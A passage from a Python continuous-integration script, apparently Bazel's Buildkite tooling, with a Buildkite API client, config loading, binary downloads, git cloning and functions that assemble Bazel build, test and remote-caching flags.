return (
urllib.request.urlopen("{}?access_token={}{}".format(url, self._token, params_str))
.read()
.decode("utf-8", "ignore")
)
except urllib.error.HTTPError as ex:
raise BuildkiteException("Failed to open {}: {} - {}".format(url, ex.code, ex.reason))
def get_build_info(self, build_number):
"""Get build info for a pipeline with a given build number
See https://buildkite.com/docs/apis/rest-api/builds#get-a-build
Parameters
----------
build_number : the build number
Returns
-------
dict
the metadata for the build
"""
url = self._BUILD_STATUS_URL_TEMPLATE.format(self._org, self._pipeline, build_number)
output = self._open_url(url)
return json.loads(output)
def get_build_info_list(self, params):
"""Get a list of build infos for this pipeline
See https://buildkite.com/docs/apis/rest-api/builds#list-builds-for-a-pipeline
Parameters
----------
params : the parameters to filter the result
Returns
-------
list of dict
the metadata for a list of builds
"""
url = self._BUILD_STATUS_URL_TEMPLATE.format(self._org, self._pipeline, "")
output = self._open_url(url, params)
return json.loads(output)
def get_build_log(self, job):
return self._open_url(job["raw_log_url"])
@staticmethod
def _check_response(response, expected_status_code):
if response.status_code != expected_status_code:
eprint("Exit code:", response.status_code)
eprint("Response:\n", response.text)
response.raise_for_status()
def trigger_new_build(self, commit, message=None, env={}):
"""Trigger a new build at a given commit and return the build metadata.
See https://buildkite.com/docs/apis/rest-api/builds#create-a-build
Parameters
----------
commit : the commit we want to build at
message : the message we should as the build titile
env : (optional) the environment variables to set
Returns
-------
dict
the metadata for the build
"""
url = self._NEW_BUILD_URL_TEMPLATE.format(self._org, self._pipeline)
data = {
"commit": commit,
"branch": "master",
"message": message if message else f"Trigger build at {commit}",
"env": env,
}
response = requests.post(url + "?access_token=" + self._token, json=data)
BuildkiteClient._check_response(response, requests.codes.created)
return json.loads(response.text)
def trigger_job_retry(self, build_number, job_id):
"""Trigger a job retry and return the job metadata.
See https://buildkite.com/docs/apis/rest-api/jobs#retry-a-job
Parameters
----------
build_number : the number of the build we want to retry
job_id : the id of the job we want to retry
Returns
-------
dict
the metadata for the job
"""
url = self._RETRY_JOB_URL_TEMPLATE.format(self._org, self._pipeline, build_number, job_id)
response = requests.put(url + "?access_token=" + self._token)
BuildkiteClient._check_response(response, requests.codes.ok)
return json.loads(response.text)
def wait_job_to_finish(self, build_number, job_id, interval_time=30, logger=None):
"""Wait a job to finish and return the job metadata
Parameters
----------
build_number : the number of the build we want to wait
job_id : the id of the job we want to wait
interval_time : (optional) the interval time to check the build status, default to 30s
logger : (optional) a logger to report progress
Returns
-------
dict
the latest metadata for the job
"""
t = 0
build_info = self.get_build_info(build_number)
while True:
for job in build_info["jobs"]:
if job["id"] == job_id:
state = job["state"]
if state != "scheduled" and state != "running" and state != "assigned":
return job
break
else:
raise BuildkiteException(
f"job id {job_id} doesn't exist in build " + build_info["web_url"]
)
url = build_info["web_url"]
if logger:
logger.log(f"Waiting for {url}, waited {t} seconds...")
time.sleep(interval_time)
t += interval_time
build_info = self.get_build_info(build_number)
def wait_build_to_finish(self, build_number, interval_time=30, logger=None):
"""Wait a build to finish and return the build metadata
Parameters
----------
build_number : the number of the build we want to wait
interval_time : (optional) the interval time to check the build status, default to 30s
logger : (optional) a logger to report progress
Returns
-------
dict
the latest metadata for the build
"""
t = 0
build_info = self.get_build_info(build_number)
while build_info["state"] == "scheduled" or build_info["state"] == "running":
url = build_info["web_url"]
if logger:
logger.log(f"Waiting for {url}, waited {t} seconds...")
time.sleep(interval_time)
t += interval_time
build_info = self.get_build_info(build_number)
return build_info
def decrypt_token(encrypted_token, kms_key):
return (
subprocess.check_output(
[
gcloud_command(),
"kms",
"decrypt",
"--project",
"bazel-untrusted",
"--location",
"global",
"--keyring",
"buildkite",
"--key",
kms_key,
"--ciphertext-file",
"-",
"--plaintext-file",
"-",
],
input=base64.b64decode(encrypted_token),
env=os.environ,
)
.decode("utf-8")
.strip()
)
def eprint(*args, **kwargs):
"""
Print to stderr and flush (just in case).
"""
print(*args, flush=True, file=sys.stderr, **kwargs)
def is_windows():
return os.name == "nt"
def gsutil_command():
return "gsutil.cmd" if is_windows() else "gsutil"
def gcloud_command():
return "gcloud.cmd" if is_windows() else "gcloud"
def downstream_projects_root(platform):
downstream_root = os.path.expandvars(PLATFORMS[platform]["downstream-root"])
if platform == "windows" and os.path.exists("d:/b"):
# If this is a Windows machine with a local SSD, the build directory is
# on drive D.
downstream_root = downstream_root.replace("c:/b/", "d:/b/")
if not os.path.exists(downstream_root):
os.makedirs(downstream_root)
return downstream_root
def fetch_configs(http_url, file_config):
"""
If specified fetches the build configuration from file_config or http_url, else tries to
read it from .bazelci/presubmit.yml.
Returns the json configuration as a python data structure.
"""
if file_config is not None and http_url is not None:
raise BuildkiteException("file_config and http_url cannot be set at the same time")
return load_config(http_url, file_config)
def load_config(http_url, file_config, allow_imports=True):
if http_url:
config = load_remote_yaml_file(http_url)
else:
file_config = file_config or ".bazelci/presubmit.yml"
with open(file_config, "r") as fd:
config = yaml.safe_load(fd)
# Legacy mode means that there is exactly one task per platform (e.g. ubuntu1604_nojdk),
# which means that we can get away with using the platform name as task ID.
# No other updates are needed since get_platform_for_task() falls back to using the
# task ID as platform if there is no explicit "platforms" field.
if "platforms" in config:
config["tasks"] = config.pop("platforms")
if "tasks" not in config:
config["tasks"] = {}
imports = config.pop("imports", None)
if imports:
if not allow_imports:
raise BuildkiteException("Nested imports are not allowed")
for i in imports:
imported_tasks = load_imported_tasks(i, http_url, file_config)
config["tasks"].update(imported_tasks)
return config
def load_remote_yaml_file(http_url):
with urllib.request.urlopen(http_url) as resp:
reader = codecs.getreader("utf-8")
return yaml.safe_load(reader(resp))
def load_imported_tasks(import_name, http_url, file_config):
if "/" in import_name:
raise BuildkiteException("Invalid import '%s'" % import_name)
old_path = http_url or file_config
new_path = "%s%s" % (old_path[: old_path.rfind("/") + 1], import_name)
if http_url:
http_url = new_path
else:
file_config = new_path
imported_config = load_config(http_url=http_url, file_config=file_config, allow_imports=False)
namespace = import_name.partition(".")[0]
tasks = {}
for task_name, task_config in imported_config["tasks"].items():
fix_imported_task_platform(task_name, task_config)
fix_imported_task_name(namespace, task_config)
fix_imported_task_working_directory(namespace, task_config)
tasks["%s_%s" % (namespace, task_name)] = task_config
return tasks
def fix_imported_task_platform(task_name, task_config):
if "platform" not in task_config:
task_config["platform"] = task_name
def fix_imported_task_name(namespace, task_config):
old_name = task_config.get("name")
task_config["name"] = "%s (%s)" % (namespace, old_name) if old_name else namespace
def fix_imported_task_working_directory(namespace, task_config):
old_dir = task_config.get("working_directory")
task_config["working_directory"] = os.path.join(namespace, old_dir) if old_dir else namespace
def print_collapsed_group(name):
eprint("\n\n--- {0}\n\n".format(name))
def print_expanded_group(name):
eprint("\n\n+++ {0}\n\n".format(name))
def is_trueish(s):
return str(s).lower() in ["true", "1", "t", "y", "yes"]
def use_bazelisk_migrate():
"""
If USE_BAZELISK_MIGRATE is set, we use `bazelisk --migrate` to test incompatible flags.
"""
return is_trueish(os.environ.get("USE_BAZELISK_MIGRATE"))
def bazelisk_flags():
return ["--migrate"] if use_bazelisk_migrate() else []
def calculate_flags(task_config, task_config_key, action_key, tmpdir, test_env_vars):
include_json_profile = task_config.get("include_json_profile", [])
capture_corrupted_outputs = task_config.get("capture_corrupted_outputs", [])
json_profile_flags = []
json_profile_out = None
if action_key in include_json_profile:
json_profile_out = os.path.join(tmpdir, "{}.profile.gz".format(action_key))
json_profile_flags = ["--profile={}".format(json_profile_out)]
capture_corrupted_outputs_flags = []
capture_corrupted_outputs_dir = None
if action_key in capture_corrupted_outputs:
capture_corrupted_outputs_dir = os.path.join(
tmpdir, "{}_corrupted_outputs".format(action_key)
)
capture_corrupted_outputs_flags = [
"--experimental_remote_capture_corrupted_outputs={}".format(
capture_corrupted_outputs_dir
)
]
flags = task_config.get(task_config_key) or []
flags += json_profile_flags
flags += capture_corrupted_outputs_flags
# We have to add --test_env flags to `build`, too, otherwise Bazel
# discards its analysis cache between `build` and `test`.
if test_env_vars:
flags += ["--test_env={}".format(v) for v in test_env_vars]
return flags, json_profile_out, capture_corrupted_outputs_dir
def execute_commands(
task_config,
platform,
git_repository,
git_commit,
repo_location,
use_bazel_at_commit,
use_but,
save_but,
needs_clean,
build_only,
test_only,
monitor_flaky_tests,
incompatible_flags,
bazel_version=None,
):
# If we want to test incompatible flags, we ignore bazel_version and always use
# the latest Bazel version through Bazelisk.
if incompatible_flags:
bazel_version = None
if not bazel_version:
# The last good version of Bazel can be specified in an emergency file.
# However, we only use last_good_bazel for pipelines that do not
# explicitly specify a version of Bazel.
try:
emergency_settings = load_remote_yaml_file(EMERGENCY_FILE_URL)
bazel_version = emergency_settings.get("last_good_bazel")
except urllib.error.HTTPError:
# Ignore this error. The Setup step will have already complained about
# it by showing an error message.
pass
if build_only and test_only:
raise BuildkiteException("build_only and test_only cannot be true at the same time")
if use_bazel_at_commit and use_but:
raise BuildkiteException("use_bazel_at_commit cannot be set when use_but is true")
tmpdir = tempfile.mkdtemp()
sc_process = None
try:
if platform == "macos" or platform == "macos_arm64":
activate_xcode(task_config)
# If the CI worker runs Bazelisk, we need to forward all required env variables to the test.
# Otherwise any integration test that invokes Bazel (=Bazelisk in this case) will fail.
test_env_vars = ["LocalAppData"] if platform == "windows" else ["HOME"]
# CI should have its own user agent so that we can remove it from Bazel download statistics.
os.environ["BAZELISK_USER_AGENT"] = "Bazelisk/BazelCI"
test_env_vars.append("BAZELISK_USER_AGENT")
if repo_location:
os.chdir(repo_location)
elif git_repository:
clone_git_repository(git_repository, platform, git_commit)
# We use one binary for all Linux platforms (because we also just release one binary for all
# Linux versions and we have to ensure that it works on all of them).
binary_platform = platform if platform in ["macos", "windows"] else LINUX_BINARY_PLATFORM
if use_bazel_at_commit:
print_collapsed_group(":gcloud: Downloading Bazel built at " + use_bazel_at_commit)
bazel_binary = download_bazel_binary_at_commit(
tmpdir, binary_platform, use_bazel_at_commit
)
os.environ["USE_BAZEL_VERSION"] = bazel_binary
elif use_but:
print_collapsed_group(":gcloud: Downloading Bazel Under Test")
bazel_binary = download_bazel_binary(tmpdir, binary_platform)
os.environ["USE_BAZEL_VERSION"] = bazel_binary
else:
bazel_binary = "bazel"
if bazel_version:
os.environ["USE_BAZEL_VERSION"] = bazel_version
if "USE_BAZEL_VERSION" in os.environ and not task_config.get(
"skip_use_bazel_version_for_test", False
):
# This will only work if the bazel binary in $PATH is actually a bazelisk binary
# (https://github.com/bazelbuild/bazelisk).
test_env_vars.append("USE_BAZEL_VERSION")
for key, value in task_config.get("environment", {}).items():
# We have to explicitly convert the value to a string, because sometimes YAML tries to
# be smart and converts strings like "true" and "false" to booleans.
os.environ[key] = os.path.expandvars(str(value))
# Set BAZELISK_SHUTDOWN to 1 when we use bazelisk --migrate on Windows.
# This is a workaround for https://github.com/bazelbuild/continuous-integration/issues/1012
if use_bazelisk_migrate() and platform == "windows":
os.environ["BAZELISK_SHUTDOWN"] = "1"
cmd_exec_func = execute_batch_commands if platform == "windows" else execute_shell_commands
cmd_exec_func(task_config.get("setup", None))
# Allow the config to override the current working directory.
required_prefix = os.getcwd()
requested_working_dir = os.path.abspath(task_config.get("working_directory", ""))
if os.path.commonpath([required_prefix, requested_working_dir]) != required_prefix:
raise BuildkiteException("working_directory refers to a path outside the workspace")
os.chdir(requested_working_dir)
if platform == "windows":
execute_batch_commands(task_config.get("batch_commands", None))
else:
execute_shell_commands(task_config.get("shell_commands", None))
bazel_version = print_bazel_version_info(bazel_binary, platform)
print_environment_variables_info()
if incompatible_flags:
print_expanded_group("Build and test with the following incompatible flags:")
for flag in incompatible_flags:
eprint(flag + "\n")
execute_bazel_run(
bazel_binary, platform, task_config.get("run_targets", None), incompatible_flags
)
if needs_clean:
execute_bazel_clean(bazel_binary, platform)
build_targets, test_targets, index_targets = calculate_targets(
task_config, platform, bazel_binary, build_only, test_only
)
if build_targets:
(
build_flags,
json_profile_out_build,
capture_corrupted_outputs_dir_build,
) = calculate_flags(task_config, "build_flags", "build", tmpdir, test_env_vars)
try:
release_name = get_release_name_from_branch_name()
execute_bazel_build(
bazel_version,
bazel_binary,
platform,
build_flags
+ (
["--stamp", "--embed_label=%s" % release_name]
if save_but and release_name
else []
),
build_targets,
None,
incompatible_flags,
)
if save_but:
upload_bazel_binary(platform)
finally:
if json_profile_out_build:
upload_json_profile(json_profile_out_build, tmpdir)
if capture_corrupted_outputs_dir_build:
upload_corrupted_outputs(capture_corrupted_outputs_dir_build, tmpdir)
if test_targets:
test_flags, json_profile_out_test, capture_corrupted_outputs_dir_test = calculate_flags(
task_config, "test_flags", "test", tmpdir, test_env_vars
)
if not is_windows():
# On platforms that support sandboxing (Linux, MacOS) we have
# to allow access to Bazelisk's cache directory.
# However, the flag requires the directory to exist,
# so we create it here in order to not crash when a test
# does not invoke Bazelisk.
bazelisk_cache_dir = get_bazelisk_cache_directory(platform)
os.makedirs(bazelisk_cache_dir, mode=0o755, exist_ok=True)
test_flags.append("--sandbox_writable_path={}".format(bazelisk_cache_dir))
test_bep_file = os.path.join(tmpdir, "test_bep.json")
upload_thread = threading.Thread(
target=upload_test_logs_from_bep, args=(test_bep_file, tmpdir, binary_platform, monitor_flaky_tests)
)
try:
upload_thread.start()
try:
execute_bazel_test(
bazel_version,
bazel_binary,
platform,
test_flags,
test_targets,
test_bep_file,
monitor_flaky_tests,
incompatible_flags,
)
finally:
if json_profile_out_test:
upload_json_profile(json_profile_out_test, tmpdir)
if capture_corrupted_outputs_dir_test:
upload_corrupted_outputs(capture_corrupted_outputs_dir_test, tmpdir)
finally:
upload_thread.join()
if index_targets:
(
index_flags,
json_profile_out_index,
capture_corrupted_outputs_dir_index,
) = calculate_flags(task_config, "index_flags", "index", tmpdir, test_env_vars)
index_upload_policy = task_config.get("index_upload_policy", "IfBuildSuccess")
index_upload_gcs = task_config.get("index_upload_gcs", False)
try:
should_upload_kzip = (
True if index_upload_policy == INDEX_UPLOAD_POLICY_ALWAYS else False
)
try:
execute_bazel_build_with_kythe(
bazel_version,
bazel_binary,
platform,
index_flags,
index_targets,
None,
incompatible_flags,
)
if index_upload_policy == INDEX_UPLOAD_POLICY_IF_BUILD_SUCCESS:
should_upload_kzip = True
except subprocess.CalledProcessError as e:
# If not running with Always policy, raise the build error.
if index_upload_policy != INDEX_UPLOAD_POLICY_ALWAYS:
handle_bazel_failure(e, "build")
if should_upload_kzip and not is_pull_request():
try:
merge_and_upload_kythe_kzip(platform, index_upload_gcs)
except subprocess.CalledProcessError:
raise BuildkiteException("Failed to upload kythe kzip")
finally:
if json_profile_out_index:
upload_json_profile(json_profile_out_index, tmpdir)
if capture_corrupted_outputs_dir_index:
upload_corrupted_outputs(capture_corrupted_outputs_dir_index, tmpdir)
finally:
terminate_background_process(sc_process)
if tmpdir:
shutil.rmtree(tmpdir)
def activate_xcode(task_config):
# Get the Xcode version from the config.
wanted_xcode_version = task_config.get("xcode_version", DEFAULT_XCODE_VERSION)
print_collapsed_group(":xcode: Activating Xcode {}...".format(wanted_xcode_version))
# Ensure it's a valid version number.
if not isinstance(wanted_xcode_version, str):
raise BuildkiteException(
"Version number '{}' is not a string. Did you forget to put it in quotes?".format(
wanted_xcode_version
)
)
if not XCODE_VERSION_REGEX.match(wanted_xcode_version):
raise BuildkiteException(
"Invalid Xcode version format '{}', must match the format X.Y[.Z].".format(
wanted_xcode_version
)
)
# This is used to replace e.g. 11.2 with 11.2.1 without having to update all configs.
xcode_version = XCODE_VERSION_OVERRIDES.get(wanted_xcode_version, wanted_xcode_version)
# This falls back to a default version if the selected version is not available.
supported_versions = sorted(
# Stripping "Xcode" prefix and ".app" suffix from e.g. "Xcode12.0.1.app" leaves just the version number.
[os.path.basename(x)[5:-4] for x in glob("/Applications/Xcode*.app")],
reverse=True,
)
if xcode_version not in supported_versions:
xcode_version = DEFAULT_XCODE_VERSION
if xcode_version != wanted_xcode_version:
print_collapsed_group(
":xcode: Fixed Xcode version: {} -> {}...".format(wanted_xcode_version, xcode_version)
)
lines = [
"Your selected Xcode version {} was not available on the machine.".format(
wanted_xcode_version
),
"Bazel CI automatically picked a fallback version: {}.".format(xcode_version),
"Available versions are: {}.".format(supported_versions),
]
execute_command(
[
"buildkite-agent",
"annotate",
"--style=warning",
"\n".join(lines),
"--context",
"ctx-xcode_version_fixed",
]
)
# Check that the selected Xcode version is actually installed on the host.
xcode_path = "/Applications/Xcode{}.app".format(xcode_version)
if not os.path.exists(xcode_path):
raise BuildkiteException("Xcode not found at '{}'.".format(xcode_path))
# Now activate the specified Xcode version and let it install its required components.
# The CI machines have a sudoers config that allows the 'buildkite' user to run exactly
# these two commands, so don't change them without also modifying the file there.
execute_command(["/usr/bin/sudo", "/usr/bin/xcode-select", "--switch", xcode_path])
execute_command(["/usr/bin/sudo", "/usr/bin/xcodebuild", "-runFirstLaunch"])
def get_bazelisk_cache_directory(platform):
# The path relies on the behavior of Go's os.UserCacheDir()
# and of the Go version of Bazelisk.
cache_dir = "Library/Caches" if platform == "macos" else ".cache"
return os.path.join(os.environ.get("HOME"), cache_dir, "bazelisk")
def current_branch_is_main_branch():
return os.getenv("BUILDKITE_BRANCH") in ("master", "stable", "main")
def get_release_name_from_branch_name():
res = re.match(r"release-(\d+\.\d+\.\d+(rc\d+)?).*", os.getenv("BUILDKITE_BRANCH"))
return res.group(1) if res else ""
def is_pull_request():
third_party_repo = os.getenv("BUILDKITE_PULL_REQUEST_REPO", "")
return len(third_party_repo) > 0
def print_bazel_version_info(bazel_binary, platform):
print_collapsed_group(":information_source: Bazel Info")
version_output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "version"]
)
execute_command(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "info"]
)
match = BUILD_LABEL_PATTERN.search(version_output)
return match.group(1) if match else "unreleased binary"
def print_environment_variables_info():
print_collapsed_group(":information_source: Environment Variables")
for key, value in os.environ.items():
eprint("%s=(%s)" % (key, value))
def upload_bazel_binary(platform):
print_collapsed_group(":gcloud: Uploading Bazel Under Test")
if platform == "windows":
binary_dir = r"bazel-bin\src"
binary_name = r"bazel.exe"
binary_nojdk_name = r"bazel_nojdk.exe"
else:
binary_dir = "bazel-bin/src"
binary_name = "bazel"
binary_nojdk_name = "bazel_nojdk"
execute_command(["buildkite-agent", "artifact", "upload", binary_name], cwd=binary_dir)
execute_command(["buildkite-agent", "artifact", "upload", binary_nojdk_name], cwd=binary_dir)
def merge_and_upload_kythe_kzip(platform, index_upload_gcs):
print_collapsed_group(":gcloud: Uploading kythe kzip")
kzips = glob("bazel-out/*/extra_actions/**/*.kzip", recursive=True)
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
git_commit = os.getenv("BUILDKITE_COMMIT")
final_kzip_name = "{}-{}-{}.kzip".format(build_number, platform, git_commit)
execute_command([f"{KYTHE_DIR}/tools/kzip", "merge", "--output", final_kzip_name] + kzips)
execute_command(["buildkite-agent", "artifact", "upload", final_kzip_name])
if index_upload_gcs:
pipeline = os.getenv("BUILDKITE_PIPELINE_SLUG")
destination = KZIPS_BUCKET + pipeline + "/" + final_kzip_name
print("Uploading to GCS {}".format(destination))
execute_command([gsutil_command(), "cp", final_kzip_name, destination])
def download_binary(dest_dir, platform, binary_name):
source_step = create_label(platform, "Bazel", build_only=True)
execute_command(
["buildkite-agent", "artifact", "download", binary_name, dest_dir, "--step", source_step]
)
bazel_binary_path = os.path.join(dest_dir, binary_name)
st = os.stat(bazel_binary_path)
os.chmod(bazel_binary_path, st.st_mode | stat.S_IEXEC)
return bazel_binary_path
def download_bazel_binary(dest_dir, platform):
binary_name = "bazel.exe" if platform == "windows" else "bazel"
return download_binary(dest_dir, platform, binary_name)
def download_bazel_nojdk_binary(dest_dir, platform):
binary_name = "bazel_nojdk.exe" if platform == "windows" else "bazel_nojdk"
return download_binary(dest_dir, platform, binary_name)
def download_binary_at_commit(
dest_dir, platform, bazel_git_commit, bazel_binary_url, bazel_binary_path
):
try:
execute_command([gsutil_command(), "cp", bazel_binary_url, bazel_binary_path])
except subprocess.CalledProcessError as e:
raise BuildkiteException(
"Failed to download Bazel binary at %s, error message:\n%s" % (bazel_git_commit, str(e))
)
st = os.stat(bazel_binary_path)
os.chmod(bazel_binary_path, st.st_mode | stat.S_IEXEC)
return bazel_binary_path
def download_bazel_binary_at_commit(dest_dir, platform, bazel_git_commit):
url = bazelci_builds_gs_url(platform, bazel_git_commit)
path = os.path.join(dest_dir, "bazel.exe" if platform == "windows" else "bazel")
return download_binary_at_commit(dest_dir, platform, bazel_git_commit, url, path)
def download_bazel_nojdk_binary_at_commit(dest_dir, platform, bazel_git_commit):
url = bazelci_builds_nojdk_gs_url(platform, bazel_git_commit)
path = os.path.join(dest_dir, "bazel_nojdk.exe" if platform == "windows" else "bazel_nojdk")
return download_binary_at_commit(dest_dir, platform, bazel_git_commit, url, path)
def download_bazelci_agent(dest_dir, platform, version):
postfix = ""
if platform == "windows":
postfix = "x86_64-pc-windows-msvc.exe"
elif platform == "macos":
postfix = "x86_64-apple-darwin"
else:
postfix = "x86_64-unknown-linux-musl"
name = "bazelci-agent-{}-{}".format(version, postfix)
url = "https://github.com/bazelbuild/continuous-integration/releases/download/agent-{}/{}".format(version, name)
path = os.path.join(dest_dir, "bazelci-agent.exe" if platform == "windows" else "bazelci-agent")
execute_command(["curl", "-sSL", url, "-o", path])
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
return path
def get_mirror_path(git_repository, platform):
mirror_root = {
"macos": "/usr/local/var/bazelbuild/",
"windows": "c:\\buildkite\\bazelbuild\\",
}.get(platform, "/var/lib/bazelbuild/")
return mirror_root + re.sub(r"[^0-9A-Za-z]", "-", git_repository)
def clone_git_repository(git_repository, platform, git_commit=None):
root = downstream_projects_root(platform)
project_name = re.search(r"/([^/]+)\.git$", git_repository).group(1)
clone_path = os.path.join(root, project_name)
print_collapsed_group(
"Fetching %s sources at %s" % (project_name, git_commit if git_commit else "HEAD")
)
mirror_path = get_mirror_path(git_repository, platform)
if not os.path.exists(clone_path):
if os.path.exists(mirror_path):
execute_command(
["git", "clone", "-v", "--reference", mirror_path, git_repository, clone_path]
)
else:
execute_command(["git", "clone", "-v", git_repository, clone_path])
os.chdir(clone_path)
execute_command(["git", "remote", "set-url", "origin", git_repository])
execute_command(["git", "clean", "-fdqx"])
execute_command(["git", "submodule", "foreach", "--recursive", "git clean -fdqx"])
execute_command(["git", "fetch", "origin"])
if git_commit:
# sync to a specific commit of this repository
execute_command(["git", "reset", git_commit, "--hard"])
else:
# sync to the latest commit of HEAD. Unlikely git pull this also works after a force push.
remote_head = (
subprocess.check_output(["git", "symbolic-ref", "refs/remotes/origin/HEAD"])
.decode("utf-8")
.rstrip()
)
execute_command(["git", "reset", remote_head, "--hard"])
execute_command(["git", "submodule", "sync", "--recursive"])
execute_command(["git", "submodule", "update", "--init", "--recursive", "--force"])
execute_command(["git", "submodule", "foreach", "--recursive", "git reset --hard"])
execute_command(["git", "clean", "-fdqx"])
execute_command(["git", "submodule", "foreach", "--recursive", "git clean -fdqx"])
return clone_path
def execute_batch_commands(commands):
if not commands:
return
print_collapsed_group(":batch: Setup (Batch Commands)")
batch_commands = "&".join(commands)
return subprocess.run(batch_commands, shell=True, check=True, env=os.environ).returncode
def execute_shell_commands(commands):
if not commands:
return
print_collapsed_group(":bash: Setup (Shell Commands)")
shell_command = "\n".join(["set -e"] + commands)
execute_command([shell_command], shell=True)
def handle_bazel_failure(exception, action):
msg = "bazel {0} failed with exit code {1}".format(action, exception.returncode)
if use_bazelisk_migrate():
print_collapsed_group(msg)
else:
raise BuildkiteException(msg)
def execute_bazel_run(bazel_binary, platform, targets, incompatible_flags):
if not targets:
return
print_collapsed_group("Setup (Run Targets)")
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
incompatible_flags_to_use = (
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags
)
for target in targets:
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["run"]
+ common_build_flags(None, platform)
+ incompatible_flags_to_use
+ [target]
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "run")
def remote_caching_flags(platform):
# Only enable caching for untrusted and testing builds.
if CLOUD_PROJECT not in ["bazel-untrusted"]:
return []
platform_cache_key = [BUILDKITE_ORG.encode("utf-8")]
# Whenever the remote cache was known to have been poisoned increase the number below
platform_cache_key += ["cache-poisoning-20210811".encode("utf-8")]
if platform == "macos":
platform_cache_key += [
# macOS version:
subprocess.check_output(["/usr/bin/sw_vers", "-productVersion"]),
# Path to Xcode:
subprocess.check_output(["/usr/bin/xcode-select", "-p"]),
# Xcode version:
subprocess.check_output(["/usr/bin/xcodebuild", "-version"]),
]
# Use a local cache server for our macOS machines.
flags = ["--remote_cache=http://100.107.73.148"]
else:
platform_cache_key += [
# Platform name:
platform.encode("utf-8")
]
# Use RBE for caching builds running on GCE.
flags = [
"--google_default_credentials",
"--remote_cache=remotebuildexecution.googleapis.com",
"--remote_instance_name=projects/{}/instances/default_instance".format(CLOUD_PROJECT),
]
platform_cache_digest = hashlib.sha256()
for key in platform_cache_key:
eprint("Adding to platform cache key: {}".format(key))
platform_cache_digest.update(key)
platform_cache_digest.update(b":")
flags += [
"--remote_timeout=60",
"--remote_max_connections=200",
'--remote_default_platform_properties=properties:{name:"cache-silo-key" value:"%s"}'
% platform_cache_digest.hexdigest(),
]
return flags
def remote_enabled(flags):
# Detect if the project configuration enabled its own remote caching / execution.
remote_flags = ["--remote_executor", "--remote_cache", "--remote_http_cache"]
for flag in flags:
for remote_flag in remote_flags:
if flag.startswith(remote_flag):
return True
return False
def concurrent_jobs(platform):
return "75" if platform.startswith("rbe_") else str(multiprocessing.cpu_count())
def concurrent_test_jobs(platform):
if platform.startswith("rbe_"):
return "75"
elif platform == "windows":
return "8"
elif platform.startswith("macos") and THIS_IS_TESTING:
return "4"
elif platform.startswith("macos"):
return "8"
return "12"
def common_startup_flags(platform):
if platform == "windows":
if os.path.exists("D:/b"):
# This machine has a local SSD mounted as drive D.
return ["--output_user_root=D:/b"]
else:
# This machine uses its PD-SSD as the build directory.
return ["--output_user_root=C:/b"]
return []
def common_build_flags(bep_file, platform):
flags = [
"--show_progress_rate_limit=5",
"--curses=yes",
"--color=yes",
"--terminal_columns=143",
"--show_timestamps",
"--verbose_failures",
"--jobs=" + concurrent_jobs(platform),
"--announce_rc",
"--experimental_repository_cache_hardlinks",
# Some projects set --disk_cache in their project-specific bazelrc, which we never want on
# CI, so let's just disable it explicitly.
"--disk_cache=",
]
if platform == "windows":
pass
elif platform == "macos":
flags += [
"--sandbox_writable_path=/var/tmp/_bazel_buildkite/cache/repos/v1",
"--test_env=REPOSITORY_CACHE=/var/tmp/_bazel_buildkite/cache/repos/v1",
]
else:
flags += ["--sandbox_tmpfs_path=/tmp"]
if bep_file:
flags += [
"--experimental_build_event_json_file_path_conversion=false",
"--build_event_json_file=" + bep_file,
]
return flags
def rbe_flags(original_flags, accept_cached):
# Enable remote execution via RBE.
flags = [
"--remote_executor=remotebuildexecution.googleapis.com",
"--remote_instance_name=projects/bazel-untrusted/instances/default_instance",
"--remote_timeout=3600",
"--incompatible_strict_action_env",
"--google_default_credentials",
"--toolchain_resolution_debug",
]
# Enable BES / Build Results reporting.
flags += [
"--bes_backend=buildeventservice.googleapis.com",
"--bes_timeout=360s",
"--project_id=bazel-untrusted",
]
if not accept_cached:
flags += ["--noremote_accept_cached"]
# Adapted from https://github.com/bazelbuild/bazel-toolchains/blob/master/bazelrc/.bazelrc
flags += [
# These should NOT longer need to be modified.
# All that is needed is updating the @bazel_toolchains repo pin
# in projects' WORKSPACE files.
#
# Toolchain related flags to append at the end of your .bazelrc file.
"--host_javabase=@buildkite_config//java:jdk",
"--javabase=@buildkite_config//java:jdk",
"--host_java_toolchain=@bazel_tools//tools/jdk:toolchain_hostjdk8",
"--java_toolchain=@bazel_tools//tools/jdk:toolchain_hostjdk8",
"--crosstool_top=@buildkite_config//cc:toolchain",
"--action_env=BAZEL_DO_NOT_DETECT_CPP_TOOLCHAIN=1",
]
# Platform flags:
# The toolchain container used for execution is defined in the target indicated
# by "extra_execution_platforms", "host_platform" and "platforms".
# If you are using your own toolchain container, you need to create a platform
# target with "constraint_values" that allow for the toolchain specified with
# "extra_toolchains" to be selected (given constraints defined in
# "exec_compatible_with").
# More about platforms: https://docs.bazel.build/versions/master/platforms.html
# Don't add platform flags if they are specified already.
platform_flags = {
"--extra_toolchains": "@buildkite_config//config:cc-toolchain",
"--extra_execution_platforms": "@buildkite_config//config:platform",
"--host_platform": "@buildkite_config//config:platform",
"--platforms": "@buildkite_config//config:platform",
}
for platform_flag, value in list(platform_flags.items()):
found = False
for original_flag in original_flags:
if original_flag.startswith(platform_flag):
found = True
break
if not found:
flags += [platform_flag + "=" + value]
return flags
def compute_flags(
platform, flags, incompatible_flags, bep_file, bazel_binary, enable_remote_cache=False
):
aggregated_flags = common_build_flags(bep_file, platform)
if not remote_enabled(flags):
if platform.startswith("rbe_"):
aggregated_flags += rbe_flags(flags, accept_cached=enable_remote_cache)
elif enable_remote_cache:
aggregated_flags += remote_caching_flags(platform)
aggregated_flags += flags
if incompatible_flags:
aggregated_flags += incompatible_flags
for i, flag in enumerate(aggregated_flags):
if "$HOME" in flag:
if platform == "windows":
if os.path.exists("D:/"):
home = "D:"
else:
home = "C:/b"
elif platform == "macos":
home = "/Users/buildkite"
else:
home = "/var/lib/buildkite-agent"
aggregated_flags[i] = flag.replace("$HOME", home)
if "$OUTPUT_BASE" in flag:
output_base = execute_command_and_get_output(
